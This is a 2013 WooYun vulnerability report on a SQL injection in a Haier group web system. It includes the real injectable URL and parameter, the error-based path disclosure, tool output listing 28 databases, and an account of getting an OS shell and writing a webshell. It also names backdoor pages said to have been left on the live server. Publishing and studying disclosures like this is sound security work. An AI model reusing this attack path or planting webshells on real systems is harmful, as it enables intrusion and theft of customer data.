当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033853

漏洞标题:海尔集团之6某系统高权限SQL注射导致沦陷

相关厂商:海尔集团

漏洞作者: 小胖子

提交时间:2013-08-08 17:44

修复时间:2013-09-22 17:44

公开时间:2013-09-22 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-08: 细节已通知厂商并且等待厂商处理中
2013-08-13: 厂商已经确认,细节仅向厂商公开
2013-08-23: 细节向核心白帽子及相关领域专家公开
2013-09-02: 细节向普通白帽子公开
2013-09-12: 细节向实习白帽子公开
2013-09-22: 细节向公众公开

简要描述:

小胖子正在暴走!!
小胖子已经无人能挡!!

详细说明:

http://home.ithaier.com/wooyun.aspx 装逼的
http://home.ithaier.com/z7y.aspx 这个是后门,请删除。@z7y 哈哈
系统就是http://home.ithaier.com/ 啦。
注入地址:
http://home.ithaier.com/TechReportDoc.aspx?ReportCode=GFCB090316028
有很多这种地址未授权访问,能看到很多的客户资料,这个算是泄露信息吧。

.png


随便加一个单引号报错并爆出绝对路径。

.png


注射出28个数据库。

available databases [28]:
[*] BaseInfo
[*] bbs_web
[*] bill
[*] csm
[*] csm_bak_1028
[*] csm_test
[*] distribution
[*] ecsm
[*] haier
[*] haier_test
[*] HaierBaseInfo
[*] haiernew
[*] HaierWeb
[*] ifhpdb
[*] km
[*] master
[*] model
[*] msdb
[*] mytemp
[*] pscm
[*] qiangdan
[*] ReportServer
[*] ReportServerTempDB
[*] SmartDriver
[*] Tech
[*] techdep
[*] tempdb
[*] TEST


SQLIN.png


发现是DBA权限,这个系统速度快 就进行了进一步的测试,osshell下dir C盘。

osshell.png


写一个马儿看看,我的天,全服沦陷。

.png


over。

漏洞证明:

available databases [28]:
[*] BaseInfo
[*] bbs_web
[*] bill
[*] csm
[*] csm_bak_1028
[*] csm_test
[*] distribution
[*] ecsm
[*] haier
[*] haier_test
[*] HaierBaseInfo
[*] haiernew
[*] HaierWeb
[*] ifhpdb
[*] km
[*] master
[*] model
[*] msdb
[*] mytemp
[*] pscm
[*] qiangdan
[*] ReportServer
[*] ReportServerTempDB
[*] SmartDriver
[*] Tech
[*] techdep
[*] tempdb
[*] TEST

修复方案:

0x1:未授权访问印发的血案,目录下很多可以不登陆访问的。
0x2:注入过滤,请。
0x3:目录权限控制不到位,导致。。。
0x4:数据库账户权限太高。
0x5:rank不给力的话我会发怒的。

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-13 12:40

厂商回复:

感谢 @小胖子 的工作。
该漏洞至今未收到业务责任部门反馈,海尔信息安全团队将持续跟进通报。
请各位白帽子持续友好监督海尔信息安全工作。

最新状态:

暂无